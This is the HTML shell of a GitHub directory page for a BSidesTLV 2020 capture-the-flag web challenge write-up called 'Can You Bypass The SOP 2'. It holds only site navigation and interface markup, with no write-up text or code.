<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump">
  Jump to
  <span class="d-inline-block ml-1 v-align-middle">↵</span>
</div>

</a> </li>

<img class="avatar mr-2 flex-shrink-0 js-jump-to-suggestion-avatar d-none" alt="" aria-label="Team" src="" width="28" height="28">

<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target">
</div>

<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search">
  <span class="js-jump-to-badge-search-text-default d-none" aria-label="in this repository">
    In this repository
  </span>
  <span class="js-jump-to-badge-search-text-global d-none" aria-label="in all of GitHub">
    All GitHub
  </span>
  <span aria-hidden="true" class="d-inline-block ml-1 v-align-middle">↵</span>
</div>

<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump">
  Jump to
  <span class="d-inline-block ml-1 v-align-middle">↵</span>
</div>

</a> </li>

</ul>

      </div>
  </label>

</form> </div> </div>

        </div>

      <div class="position-relative mr-lg-3 d-lg-inline-block">
        <a href="/login?return_to=https%3A%2F%2Fgithub.com%2Ftrott4425%2FCTF-Writeups%2Ftree%2Fmaster%2FBSidesTLV-2020%2Fweb%2FCan%2520You%2520Bypass%2520The%2520SOP%25202"
          class="HeaderMenu-link HeaderMenu-link--sign-in flex-shrink-0 no-underline d-block d-lg-inline-block border border-lg-0 rounded rounded-lg-0 p-2 p-lg-0"
          data-hydro-click="{&quot;event_type&quot;:&quot;authentication.click&quot;,&quot;payload&quot;:{&quot;location_in_page&quot;:&quot;site header menu&quot;,&quot;repository_id&quot;:null,&quot;auth_type&quot;:&quot;SIGN_UP&quot;,&quot;originating_url&quot;:&quot;https://github.com/trott4425/CTF-Writeups/tree/master/BSidesTLV-2020/web/Can%20You%20Bypass%20The%20SOP%202&quot;,&quot;user_id&quot;:null}}" data-hydro-click-hmac="98c0d80827cf705f354b70b5cab50e240af8a49bf4b361b4721f202c46b73510"
          data-ga-click="(Logged out) Header, clicked Sign in, text:sign-in">
          Sign in
        </a>
      </div>

        <a href="/signup?ref_cta=Sign+up&amp;ref_loc=header+logged+out&amp;ref_page=%2F%3Cuser-name%3E%2F%3Crepo-name%3E%2Ffiles%2Fdisambiguate&amp;source=header-repo&amp;source_repo=trott4425%2FCTF-Writeups"
          class="HeaderMenu-link HeaderMenu-link--sign-up flex-shrink-0 d-none d-lg-inline-block no-underline border color-border-default rounded px-2 py-1"
          data-hydro-click="{&quot;event_type&quot;:&quot;authentication.click&quot;,&quot;payload&quot;:{&quot;location_in_page&quot;:&quot;site header menu&quot;,&quot;repository_id&quot;:null,&quot;auth_type&quot;:&quot;SIGN_UP&quot;,&quot;originating_url&quot;:&quot;https://github.com/trott4425/CTF-Writeups/tree/master/BSidesTLV-2020/web/Can%20You%20Bypass%20The%20SOP%202&quot;,&quot;user_id&quot;:null}}" data-hydro-click-hmac="98c0d80827cf705f354b70b5cab50e240af8a49bf4b361b4721f202c46b73510"
          data-analytics-event="{&quot;category&quot;:&quot;Sign up&quot;,&quot;action&quot;:&quot;click to sign up for account&quot;,&quot;label&quot;:&quot;ref_page:/&lt;user-name&gt;/&lt;repo-name&gt;/files/disambiguate;ref_cta:Sign up;ref_loc:header logged out&quot;}"
        >
          Sign up
        </a>
    </div>
  </div>
</div>

</div> </header>

</div>

<div id="js-flash-container" data-turbo-replace>

  <div>{{ message }}</div>

</div>

</div> </div> </template> </div>

<include-fragment class="js-notification-shelf-include-fragment" data-base-src="https://github.com/notifications/beta/shelf"></include-fragment>

<div class="application-main " data-commit-hovercards-enabled data-discussion-hovercards-enabled data-issue-and-pr-hovercards-enabled

    <div itemscope itemtype="http://schema.org/SoftwareSourceCode" class="">
<main id="js-repo-pjax-container" >

  <div class="d-flex flex-wrap flex-justify-end mb-3  px-3 px-md-4 px-lg-5" style="gap: 1rem;">

    <div class="flex-auto min-width-0 width-fit mr-3">

<span class="author flex-self-stretch" itemprop="author">
  <a class="url fn" rel="author" data-hovercard-type="user" data-hovercard-url="/users/trott4425/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="/trott4425">
    trott4425

</a> </span> <span class="mx-1 flex-self-stretch color-fg-muted">/</span> <strong itemprop="name" class="mr-2 flex-self-stretch"> <a data-pjax="#repo-content-pjax-container" data-turbo-frame="repo-content-turbo-frame" href="/trott4425/CTF-Writeups">CTF-Writeups</a> </strong>

<span></span><span class="Label Label--secondary v-align-middle mr-1">Public</span>

</div>

    </div>

      <ul class="pagehead-actions flex-shrink-0 d-none d-md-inline" style="padding: 2px 0;">

<li> <a href="/login?return_to=%2Ftrott4425%2FCTF-Writeups" rel="nofollow" data-hydro-click="{"event_type":"authentication.click","payload":{"location_in_page":"notification subscription menu watch","repository_id":null,"auth_type":"LOG_IN","originating_url":"https://github.com/trott4425/CTF-Writeups/tree/master/BSidesTLV-2020/web/Can%20You%20Bypass%20The%20SOP%202","user_id":null}}" data-hydro-click-hmac="b10158098f46bea88d80f01a09d539a524aefe0b159a911f30b823185c9f9604" aria-label="You must be signed in to change notification settings" data-view-component="true" class="tooltipped tooltipped-s btn-sm btn"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-bell mr-2"> <path d="M8 16a2 2 0 0 0 1.985-1.75c.017-.137-.097-.25-.235-.25h-3.5c-.138 0-.252.113-.235.25A2 2 0 0 0 8 16ZM3 5a5 5 0 0 1 10 0v2.947c0 .05.015.098.042.139l1.703 2.555A1.519 1.519 0 0 1 13.482 13H2.518a1.516 1.516 0 0 1-1.263-2.36l1.703-2.554A.255.255 0 0 0 3 7.947Zm5-3.5A3.5 3.5 0 0 0 4.5 5v2.947c0 .346-.102.683-.294.97l-1.703 2.556a.017.017 0 0 0-.003.01l.001.006c0 .002.002.004.004.006l.006.004.007.001h10.964l.007-.001.006-.004.004-.006.001-.007a.017.017 0 0 0-.003-.01l-1.703-2.554a1.745 1.745 0 0 1-.294-.97V5A3.5 3.5 0 0 0 8 1.5Z"></path> </svg>Notifications </a> </li>

</ul>

  </div>

    <div id="responsive-meta-container" data-turbo-replace>

</div>

      <nav data-pjax="#js-repo-pjax-container" aria-label="Repository" data-view-component="true" class="js-repo-nav js-sidenav-container-pjax js-responsive-underlinenav overflow-hidden UnderlineNav px-3 px-md-4 px-lg-5">

            <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code UnderlineNav-octicon d-none d-sm-inline">
<path d="m11.28 3.22 4.25 4.25a.75.75 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.275-.326.749.749 0 0 1 .215-.734L13.94 8l-3.72-3.72a.749.749 0 0 1 .326-1.275.749.749 0 0 1 .734.215Zm-6.56 0a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042L2.06 8l3.72 3.72a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L.47 8.53a.75.75 0 0 1 0-1.06Z"></path>

</svg> <span data-content="Code">Code</span> <span id="code-repo-tab-count" data-pjax-replace="" data-turbo-replace="" title="Not available" data-view-component="true" class="Counter"></span>

</a></li> <li data-view-component="true" class="d-inline-flex"> <a id="issues-tab" href="/trott4425/CTF-Writeups/issues" data-tab-item="i1issues-tab" data-selected-links="repo_issues repo_labels repo_milestones /trott4425/CTF-Writeups/issues" data-pjax="#repo-content-pjax-container" data-turbo-frame="repo-content-turbo-frame" data-hotkey="g i" data-analytics-event="{"category":"Underline navbar","action":"Click tab","label":"Issues","target":"UNDERLINE_NAV.TAB"}" data-view-component="true" class="UnderlineNav-item no-wrap js-responsive-underlinenav-item js-selected-navigation-item">

            <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-issue-opened UnderlineNav-octicon d-none d-sm-inline">
<path d="M8 9.5a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path><path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Z"></path>

</svg> <span data-content="Issues">Issues</span> <span id="issues-repo-tab-count" data-pjax-replace="" data-turbo-replace="" title="0" hidden="hidden" data-view-component="true" class="Counter">0</span>

</a></li> <li data-view-component="true" class="d-inline-flex"> <a id="pull-requests-tab" href="/trott4425/CTF-Writeups/pulls" data-tab-item="i2pull-requests-tab" data-selected-links="repo_pulls checks /trott4425/CTF-Writeups/pulls" data-pjax="#repo-content-pjax-container" data-turbo-frame="repo-content-turbo-frame" data-hotkey="g p" data-analytics-event="{"category":"Underline navbar","action":"Click tab","label":"Pull requests","target":"UNDERLINE_NAV.TAB"}" data-view-component="true" class="UnderlineNav-item no-wrap js-responsive-underlinenav-item js-selected-navigation-item">

            <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-pull-request UnderlineNav-octicon d-none d-sm-inline">
<path d="M1.5 3.25a2.25 2.25 0 1 1 3 2.122v5.256a2.251 2.251 0 1 1-1.5 0V5.372A2.25 2.25 0 0 1 1.5 3.25Zm5.677-.177L9.573.677A.25.25 0 0 1 10 .854V2.5h1A2.5 2.5 0 0 1 13.5 5v5.628a2.251 2.251 0 1 1-1.5 0V5a1 1 0 0 0-1-1h-1v1.646a.25.25 0 0 1-.427.177L7.177 3.427a.25.25 0 0 1 0-.354ZM3.75 2.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm0 9.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm8.25.75a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Z"></path>

</svg> <span data-content="Pull requests">Pull requests</span> <span id="pull-requests-repo-tab-count" data-pjax-replace="" data-turbo-replace="" title="0" hidden="hidden" data-view-component="true" class="Counter">0</span>

</a></li> <li data-view-component="true" class="d-inline-flex"> <a id="actions-tab" href="/trott4425/CTF-Writeups/actions" data-tab-item="i3actions-tab" data-selected-links="repo_actions /trott4425/CTF-Writeups/actions" data-pjax="#repo-content-pjax-container" data-turbo-frame="repo-content-turbo-frame" data-hotkey="g a" data-analytics-event="{"category":"Underline navbar","action":"Click tab","label":"Actions","target":"UNDERLINE_NAV.TAB"}" data-view-component="true" class="UnderlineNav-item no-wrap js-responsive-underlinenav-item js-selected-navigation-item">

            <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-play UnderlineNav-octicon d-none d-sm-inline">
<path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Zm4.879-2.773 4.264 2.559a.25.25 0 0 1 0 .428l-4.264 2.559A.25.25 0 0 1 6 10.559V5.442a.25.25 0 0 1 .379-.215Z"></path>

</svg> <span data-content="Actions">Actions</span> <span id="actions-repo-tab-count" data-pjax-replace="" data-turbo-replace="" title="Not available" data-view-component="true" class="Counter"></span>

</a></li> <li data-view-component="true" class="d-inline-flex"> <a id="projects-tab" href="/trott4425/CTF-Writeups/projects" data-tab-item="i4projects-tab" data-selected-links="repo_projects new_repo_project repo_project /trott4425/CTF-Writeups/projects" data-pjax="#repo-content-pjax-container" data-turbo-frame="repo-content-turbo-frame" data-hotkey="g b" data-analytics-event="{"category":"Underline navbar","action":"Click tab","label":"Projects","target":"UNDERLINE_NAV.TAB"}" data-view-component="true" class="UnderlineNav-item no-wrap js-responsive-underlinenav-item js-selected-navigation-item">

            <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-table UnderlineNav-octicon d-none d-sm-inline">
<path d="M0 1.75C0 .784.784 0 1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25ZM6.5 6.5v8h7.75a.25.25 0 0 0 .25-.25V6.5Zm8-1.5V1.75a.25.25 0 0 0-.25-.25H6.5V5Zm-13 1.5v7.75c0 .138.112.25.25.25H5v-8ZM5 5V1.5H1.75a.25.25 0 0 0-.25.25V5Z"></path>

</svg> <span data-content="Projects">Projects</span> <span id="projects-repo-tab-count" data-pjax-replace="" data-turbo-replace="" title="0" hidden="hidden" data-view-component="true" class="Counter">0</span>

</a></li> <li data-view-component="true" class="d-inline-flex"> <a id="security-tab" href="/trott4425/CTF-Writeups/security" data-tab-item="i5security-tab" data-selected-links="security overview alerts policy token_scanning code_scanning /trott4425/CTF-Writeups/security" data-pjax="#repo-content-pjax-container" data-turbo-frame="repo-content-turbo-frame" data-hotkey="g s" data-analytics-event="{"category":"Underline navbar","action":"Click tab","label":"Security","target":"UNDERLINE_NAV.TAB"}" data-view-component="true" class="UnderlineNav-item no-wrap js-responsive-underlinenav-item js-selected-navigation-item">

            <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-shield UnderlineNav-octicon d-none d-sm-inline">
<path d="M7.467.133a1.748 1.748 0 0 1 1.066 0l5.25 1.68A1.75 1.75 0 0 1 15 3.48V7c0 1.566-.32 3.182-1.303 4.682-.983 1.498-2.585 2.813-5.032 3.855a1.697 1.697 0 0 1-1.33 0c-2.447-1.042-4.049-2.357-5.032-3.855C1.32 10.182 1 8.566 1 7V3.48a1.75 1.75 0 0 1 1.217-1.667Zm.61 1.429a.25.25 0 0 0-.153 0l-5.25 1.68a.25.25 0 0 0-.174.238V7c0 1.358.275 2.666 1.057 3.86.784 1.194 2.121 2.34 4.366 3.297a.196.196 0 0 0 .154 0c2.245-.956 3.582-2.104 4.366-3.298C13.225 9.666 13.5 8.36 13.5 7V3.48a.251.251 0 0 0-.174-.237l-5.25-1.68ZM8.75 4.75v3a.75.75 0 0 1-1.5 0v-3a.75.75 0 0 1 1.5 0ZM9 10.5a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path>

</svg> <span data-content="Security">Security</span> <include-fragment src="/trott4425/CTF-Writeups/security/overall-count" accept="text/fragment+html"></include-fragment>

</a></li> <li data-view-component="true" class="d-inline-flex"> <a id="insights-tab" href="/trott4425/CTF-Writeups/pulse" data-tab-item="i6insights-tab" data-selected-links="repo_graphs repo_contributors dependency_graph dependabot_updates pulse people community /trott4425/CTF-Writeups/pulse" data-pjax="#repo-content-pjax-container" data-turbo-frame="repo-content-turbo-frame" data-analytics-event="{"category":"Underline navbar","action":"Click tab","label":"Insights","target":"UNDERLINE_NAV.TAB"}" data-view-component="true" class="UnderlineNav-item no-wrap js-responsive-underlinenav-item js-selected-navigation-item">

            <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-graph UnderlineNav-octicon d-none d-sm-inline">
<path d="M1.5 1.75V13.5h13.75a.75.75 0 0 1 0 1.5H.75a.75.75 0 0 1-.75-.75V1.75a.75.75 0 0 1 1.5 0Zm14.28 2.53-5.25 5.25a.75.75 0 0 1-1.06 0L7 7.06 4.28 9.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.25-3.25a.75.75 0 0 1 1.06 0L10 7.94l4.72-4.72a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042Z"></path>

</svg> <span data-content="Insights">Insights</span> <span id="insights-repo-tab-count" data-pjax-replace="" data-turbo-replace="" title="Not available" data-view-component="true" class="Counter"></span>

</a></li> </ul> <div style="visibility:hidden;" data-view-component="true" class="UnderlineNav-actions js-responsive-underlinenav-overflow position-absolute pr-3 pr-md-4 pr-lg-5 right-0"> <details data-view-component="true" class="details-overlay details-reset position-relative"> <summary role="button" data-view-component="true"> <div class="UnderlineNav-item mr-0 border-0"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3ZM1.5 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Zm13 0a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path> </svg> <span class="sr-only">More</span> </div> </summary> <details-menu role="menu" data-view-component="true" class="dropdown-menu dropdown-menu-sw"> <ul> <li data-menu-item="i0code-tab" hidden> <a role="menuitem" class="js-selected-navigation-item selected dropdown-item" aria-current="page" data-selected-links="repo_source repo_downloads repo_commits repo_releases repo_tags repo_branches repo_packages repo_deployments /trott4425/CTF-Writeups" href="/trott4425/CTF-Writeups"> Code </a> </li> <li data-menu-item="i1issues-tab" hidden> <a role="menuitem" class="js-selected-navigation-item dropdown-item" data-selected-links="repo_issues repo_labels repo_milestones /trott4425/CTF-Writeups/issues" href="/trott4425/CTF-Writeups/issues"> Issues </a> </li> <li data-menu-item="i2pull-requests-tab" hidden> <a role="menuitem" class="js-selected-navigation-item dropdown-item" data-selected-links="repo_pulls checks /trott4425/CTF-Writeups/pulls" href="/trott4425/CTF-Writeups/pulls"> Pull requests </a> </li> <li data-menu-item="i3actions-tab" hidden> <a role="menuitem" class="js-selected-navigation-item dropdown-item" data-selected-links="repo_actions /trott4425/CTF-Writeups/actions" href="/trott4425/CTF-Writeups/actions"> Actions </a> </li> <li data-menu-item="i4projects-tab" hidden> <a role="menuitem" class="js-selected-navigation-item dropdown-item" data-selected-links="repo_projects new_repo_project repo_project /trott4425/CTF-Writeups/projects" href="/trott4425/CTF-Writeups/projects"> Projects </a> </li> <li data-menu-item="i5security-tab" hidden> <a role="menuitem" class="js-selected-navigation-item dropdown-item" data-selected-links="security overview alerts policy token_scanning code_scanning /trott4425/CTF-Writeups/security" href="/trott4425/CTF-Writeups/security"> Security </a> </li> <li data-menu-item="i6insights-tab" hidden> <a role="menuitem" class="js-selected-navigation-item dropdown-item" data-selected-links="repo_graphs repo_contributors dependency_graph dependabot_updates pulse people community /trott4425/CTF-Writeups/pulse" href="/trott4425/CTF-Writeups/pulse"> Insights </a> </li> </ul> </details-menu> </details></div> </nav>

</div>

<turbo-frame id="repo-content-turbo-frame" target="_top" data-turbo-action="advance" class=""> <div id="repo-content-pjax-container" class="repository-content " >

<div class="position-relative"> <details class="js-branch-select-menu details-reset details-overlay mr-0 mb-0 " id="branch-select-menu" data-hydro-click-payload="{"event_type":"repository.click","payload":{"target":"REFS_SELECTOR_MENU","repository_id":276119642,"originating_url":"https://github.com/trott4425/CTF-Writeups/tree/master/BSidesTLV-2020/web/Can%20You%20Bypass%20The%20SOP%202","user_id":null}}" data-hydro-click-hmac="ef23180492e45503ef2da7d8df82dbd12c24f945a51e831b46a952ddab15b8c8"> <summary class="btn css-truncate" data-hotkey="w" title="Switch branches or tags"> <svg text="gray" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-branch"> <path d="M9.5 3.25a2.25 2.25 0 1 1 3 2.122V6A2.5 2.5 0 0 1 10 8.5H6a1 1 0 0 0-1 1v1.128a2.251 2.251 0 1 1-1.5 0V5.372a2.25 2.25 0 1 1 1.5 0v1.836A2.493 2.493 0 0 1 6 7h4a1 1 0 0 0 1-1v-.628A2.25 2.25 0 0 1 9.5 3.25Zm-6 0a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Zm8.25-.75a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5ZM4.25 12a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Z"></path> </svg> <span class="css-truncate-target" data-menu-button>master</span> <span class="dropdown-caret"></span> </summary>

<div class="SelectMenu"> <div class="SelectMenu-modal"> <header class="SelectMenu-header"> <span class="SelectMenu-title">Switch branches/tags</span> <button class="SelectMenu-closeButton" type="button" data-toggle-for="branch-select-menu"><svg aria-label="Close menu" aria-hidden="false" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path> </svg></button> </header>

<input-demux data-action="tab-container-change:input-demux#storeInput tab-container-changed:input-demux#updateInput">
  <tab-container class="d-flex flex-column js-branches-tags-tabs" style="min-height: 0;">
    <div class="SelectMenu-filter">
      <input data-target="input-demux.source"
             id="context-commitish-filter-field"
             class="SelectMenu-input form-control"
             aria-owns="ref-list-branches"
             data-controls-ref-menu-id="ref-list-branches"
             autofocus
             autocomplete="off"
             aria-label="Filter branches/tags"
             placeholder="Filter branches/tags"
             type="text"
      >
    </div>

    <div class="SelectMenu-tabs" role="tablist" data-target="input-demux.control" >
      <button class="SelectMenu-tab" type="button" role="tab" aria-selected="true">Branches</button>
      <button class="SelectMenu-tab" type="button" role="tab">Tags</button>
    </div>

    <div role="tabpanel" id="ref-list-branches" data-filter-placeholder="Filter branches/tags" tabindex="" class="d-flex flex-column flex-auto overflow-auto">
      <ref-selector
        type="branch"
        data-targets="input-demux.sinks"
        data-action="
          input-entered:ref-selector#inputEntered
          tab-selected:ref-selector#tabSelected
          focus-list:ref-selector#focusFirstListMember
        "
        query-endpoint="/trott4425/CTF-Writeups/refs"
        
        cache-key="v0:1593527773.0"
        current-committish="bWFzdGVy"
        default-branch="bWFzdGVy"
        name-with-owner="dHJvdHQ0NDI1L0NURi1Xcml0ZXVwcw=="
        prefetch-on-mouseover
      >

        <template data-target="ref-selector.fetchFailedTemplate">
          <div class="SelectMenu-message" data-index="{{ index }}">Could not load branches</div>
        </template>

          <template data-target="ref-selector.noMatchTemplate">
<div class="SelectMenu-message">Nothing to show</div>

</template>

        <div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list " data-turbo-frame="repo-content-turbo-frame">
          <div class="SelectMenu-loading pt-3 pb-0 overflow-hidden" aria-label="Menu is loading">
            <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate">

<template data-target="ref-selector.itemTemplate"> <a href="https://github.com/trott4425/CTF-Writeups/tree/{{ urlEncodedRefName }}/BSidesTLV-2020/web/Can%20You%20Bypass%20The%20SOP%202" class="SelectMenu-item" role="menuitemradio" rel="nofollow" aria-checked="{{ isCurrent }}" data-index="{{ index }}" > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path> </svg> <span class="flex-1 css-truncate css-truncate-overflow {{ isFilteringClass }}">{{ refName }}</span> <span hidden="{{ isNotDefault }}" class="Label Label--secondary flex-self-start">default</span> </a> </template>

          <footer class="SelectMenu-footer"><a href="/trott4425/CTF-Writeups/branches">View all branches</a></footer>
      </ref-selector>

    </div>

    <div role="tabpanel" id="tags-menu" data-filter-placeholder="Find a tag" tabindex="" hidden class="d-flex flex-column flex-auto overflow-auto">
      <ref-selector
        type="tag"
        data-action="
          input-entered:ref-selector#inputEntered
          tab-selected:ref-selector#tabSelected
          focus-list:ref-selector#focusFirstListMember
        "
        data-targets="input-demux.sinks"
        query-endpoint="/trott4425/CTF-Writeups/refs"
        cache-key="v0:1593527773.0"
        current-committish="bWFzdGVy"
        default-branch="bWFzdGVy"
        name-with-owner="dHJvdHQ0NDI1L0NURi1Xcml0ZXVwcw=="
      >

        <template data-target="ref-selector.fetchFailedTemplate">
          <div class="SelectMenu-message" data-index="{{ index }}">Could not load tags</div>
        </template>

        <template data-target="ref-selector.noMatchTemplate">
          <div class="SelectMenu-message" data-index="{{ index }}">Nothing to show</div>
        </template>

        <div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list" data-turbo-frame="repo-content-turbo-frame">
          <div class="SelectMenu-loading pt-3 pb-0 overflow-hidden" aria-label="Menu is loading">
            <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate">

</details>

</div>

<div class="Overlay--hidden Overlay-backdrop--center" data-modal-dialog-overlay> <modal-dialog role="dialog" id="warn-tag-match-create-branch-dialog" aria-modal="true" aria-labelledby="warn-tag-match-create-branch-dialog-header" data-view-component="true" class="Overlay Overlay--width-large Overlay--height-auto Overlay--motion-scaleFade"> <header class="Overlay-header Overlay-header--large Overlay-header--divided"> <div class="Overlay-headerContentWrap"> <div class="Overlay-titleWrap"> <h1 id="warn-tag-match-create-branch-dialog-header" class="Overlay-title">Name already in use</h1> </div> <div class="Overlay-actionWrap"> <button data-close-dialog-id="warn-tag-match-create-branch-dialog" aria-label="Close" type="button" data-view-component="true" class="close-button Overlay-closeButton"><svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path> </svg></button> </div> </div> </header> <div class="Overlay-body ">

      <div data-view-component="true">      A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

</div>

</div>
  <footer class="Overlay-footer Overlay-footer--alignEnd">
        <button data-close-dialog-id="warn-tag-match-create-branch-dialog" type="button" data-view-component="true" class="btn">    Cancel

</button> <button data-submit-dialog-id="warn-tag-match-create-branch-dialog" type="button" data-view-component="true" class="btn-danger btn"> Create </button> </footer> </modal-dialog></div>

<div class="flex-1 mx-2 flex-self-center f4">
  <div class="d-none d-sm-block">
    <span class="js-repo-root text-bold"><span class="js-path-segment d-inline-block wb-break-all"><a data-turbo-frame="repo-content-turbo-frame" href="/trott4425/CTF-Writeups"><span>CTF-Writeups</span></a></span></span><span class="mx-1">/</span><span class="js-path-segment d-inline-block wb-break-all"><a data-turbo-frame="repo-content-turbo-frame" href="/trott4425/CTF-Writeups/tree/master/BSidesTLV-2020"><span>BSidesTLV-2020</span></a></span><span class="mx-1">/</span><span class="js-path-segment d-inline-block wb-break-all"><a data-turbo-frame="repo-content-turbo-frame" href="/trott4425/CTF-Writeups/tree/master/BSidesTLV-2020/web"><span>web</span></a></span><span class="mx-1">/</span><strong class="final-path">Can You Bypass The SOP 2</strong><span class="mx-1">/</span>
  </div>
</div>

<div class="d-flex">
  <a class="btn mr-2 d-none d-md-block" data-hydro-click="{&quot;event_type&quot;:&quot;repository.click&quot;,&quot;payload&quot;:{&quot;target&quot;:&quot;FIND_FILE_BUTTON&quot;,&quot;repository_id&quot;:276119642,&quot;originating_url&quot;:&quot;https://github.com/trott4425/CTF-Writeups/tree/master/BSidesTLV-2020/web/Can%20You%20Bypass%20The%20SOP%202&quot;,&quot;user_id&quot;:null}}" data-hydro-click-hmac="ac68ff2b0b6c3eb667c4c940a1fafa96983ac541d21ff0bd668ff0ee7bf7b930" data-ga-click="Repository, find file, location:repo overview" data-hotkey="t" href="/trott4425/CTF-Writeups/find/master">
    Go to file

</a> </div> </div>

<div class="f4 mt-3 mb-3 d-sm-none"><span class="js-repo-root text-bold"><span class="js-path-segment d-inline-block wb-break-all"><a href="/trott4425/CTF-Writeups"><span>CTF-Writeups</span></a></span></span><span class="mx-1">/</span><span class="js-path-segment d-inline-block wb-break-all"><a href="/trott4425/CTF-Writeups/tree/master/BSidesTLV-2020"><span>BSidesTLV-2020</span></a></span><span class="mx-1">/</span><span class="js-path-segment d-inline-block wb-break-all"><a href="/trott4425/CTF-Writeups/tree/master/BSidesTLV-2020/web"><span>web</span></a></span><span class="mx-1">/</span><strong class="final-path">Can You Bypass The SOP 2</strong><span class="separator mx-1">/</span></div>

<div class="Box mb-3" > <div class="Box-header position-relative"> <h2 class="sr-only">Latest commit</h2> <div class="js-details-container Details d-flex rounded-top-2 flex-items-center flex-wrap" data-issue-and-pr-hovercards-enabled> <include-fragment src="/trott4425/CTF-Writeups/tree-commit/d1339e79c3236b2a4b0803c2fb4cfc349134fb80/BSidesTLV-2020/web/Can%20You%20Bypass%20The%20SOP%202" class="d-flex flex-auto flex-items-center" aria-busy="true" aria-label="Loading latest commit"> <div class="Skeleton avatar avatar-user flex-shrink-0 ml-n1 mr-n1 mt-n1 mb-n1" style="width:24px;height:24px;"></div> <div class="Skeleton Skeleton--text col-5 ml-3"> </div> </include-fragment> <div class="flex-shrink-0"> <h2 class="sr-only">Git stats</h2> <ul class="list-style-none d-flex"> <li class="ml-0 ml-md-3"> <a data-pjax="#repo-content-pjax-container" data-turbo-frame="repo-content-turbo-frame" href="/trott4425/CTF-Writeups/commits/master/BSidesTLV-2020/web/Can%20You%20Bypass%20The%20SOP%202" class="pl-3 pr-3 py-3 p-md-0 mt-n3 mb-n3 mr-n3 m-md-0 Link--primary no-underline no-wrap"> <svg text="gray" 